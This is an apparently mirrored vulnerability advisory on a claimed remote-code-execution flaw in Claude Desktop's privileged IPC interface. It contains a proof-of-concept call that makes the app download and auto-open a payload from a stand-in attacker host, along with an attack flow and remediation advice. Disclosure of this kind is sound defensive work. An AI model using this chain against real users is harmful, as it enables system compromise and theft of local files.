Share
## https://sploitus.com/exploit?id=18102E78-0240-5785-9C40-493FCA754ED1
# CVE-2026-PENDING: Claude Desktop Remote Code Execution via Privileged IPC



## ๐ด Overview
A critical remote code execution (RCE) vulnerability exists in **Claude Desktop** (version 1.0.1307 and potentially earlier) that allows attackers to execute arbitrary code on user systems through a privileged Inter-Process Communication (IPC) interface.
The vulnerability stems from:
1. **Overly permissive origin validation** trusting `preview.claude.ai` subdomain
2. **Dangerous IPC sink** (`writeFileDownloadAndOpen`) that auto-executes downloaded files
3. **No user confirmation** before file execution
## ๐ฏ Impact
- โ
**Remote Code Execution**: Full system compromise
- โ
**Data Exfiltration**: Access to local files via exposed IPC methods
- โ
**Persistence**: Malicious MCP server injection
- โ
**Zero-Click (with XSS)**: No user interaction beyond visiting a page
**CVSS 3.1 Score:** 9.6 (CRITICAL)
**Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`
## ๐ฌ Technical Details
### Vulnerable Code
**File:** `index.js` (Main Process)
```javascript
writeFileDownloadAndOpen:async function(r,a){
const s=new URL(a);
if(!ts(s.host))return;
const o=await(await de.net.fetch(a)).bytes();
// ... saves file to path m ...
await de.shell.openPath(m); // โ ๏ธ AUTO-EXECUTES FILE
}
```
### Flawed Origin Validation
```javascript
function vt(t){
const e=new URL(t.senderFrame.url);
return !!(
e.origin==="https://claude.ai"||
e.origin==="https://preview.claude.ai"|| // โ ๏ธ VULNERABLE
e.origin==="https://claude.com"||
e.origin==="https://preview.claude.com" // โ ๏ธ VULNERABLE
)
}
```
### Exposed to Renderer
```javascript
// Accessible from JavaScript in trusted origins
window['claude.web'].FileSystem.writeFileDownloadAndOpen(filename, url)
```
## ๐ฃ Proof of Concept
### Scenario: XSS on preview.claude.ai
```javascript
// Attacker achieves XSS on preview.claude.ai
const fs = window['claude.web'].FileSystem;
// Download and execute malicious payload
await fs.writeFileDownloadAndOpen(
'update.dmg',
'https://attacker.com/malware.dmg'
);
// File is automatically downloaded to ~/Downloads and executed
// No user confirmation required!
```
### Attack Flow
```
1. Attacker finds XSS on preview.claude.ai
2. User visits malicious page (e.g., via phishing)
3. JavaScript calls window['claude.web'].FileSystem.writeFileDownloadAndOpen()
4. Malicious file downloaded to ~/Downloads
5. shell.openPath() auto-executes the file
6. System compromised
```
## ๐ก๏ธ Affected Versions
- **Claude Desktop 1.0.1307** (confirmed)
- Potentially all versions with the `claude.web.FileSystem` interface
## ๐ง Remediation
### Immediate Actions
1. **Remove preview domains from trusted origins**
```javascript
// Remove these lines from vt() function:
e.origin==="https://preview.claude.ai"||
e.origin==="https://preview.claude.com"||
```
2. **Disable auto-execution**
```javascript
// Replace shell.openPath() with user confirmation dialog
const {response} = await dialog.showMessageBox({
type: 'warning',
message: 'Open downloaded file?',
buttons: ['Open', 'Cancel']
});
if (response === 0) await shell.openPath(m);
```
3. **Implement file validation**
- Whitelist allowed file extensions
- Verify file signatures
- Scan with antivirus before execution
### Long-term Solutions
- Conduct full security audit of all IPC handlers
- Implement principle of least privilege
- Add Content Security Policy
- Remove unnecessary privileged IPC methods
## ๐ Timeline
- **2026-01-23**: Vulnerability discovered through source code analysis
- **2026-01-23**: CVE request prepared
- **[Pending]**: Vendor notification
- **[Pending]**: Public disclosure (90 days after vendor notification)
## ๐ Additional Vulnerabilities
This research also identified:
- `readOpenDocumentAsBase64`: Allows reading arbitrary local files
- Weak MCP server validation: Potential for config injection
- Deep link handler issues: Possible navigation bypass
## โ ๏ธ Disclaimer
This research is provided for educational and defensive security purposes only. The PoC is intentionally incomplete to prevent malicious use. Responsible disclosure practices are being followed.
## ๐ References
- [CVE Request Form](./CVE_REQUEST_CLAUDE_DESKTOP_RCE.md)
- [Detailed Technical Analysis](./TECHNICAL_ANALYSIS.md)
- [Electron Security Best Practices](https://www.electronjs.org/docs/latest/tutorial/security)
## ๐ค Researcher
**Discovered by:** [Your Name/Handle]
**Contact:** [Your Email/Twitter]
**Date:** January 23, 2026
---
**Status:** ๐ด UNPATCHED - Zero-Day Vulnerability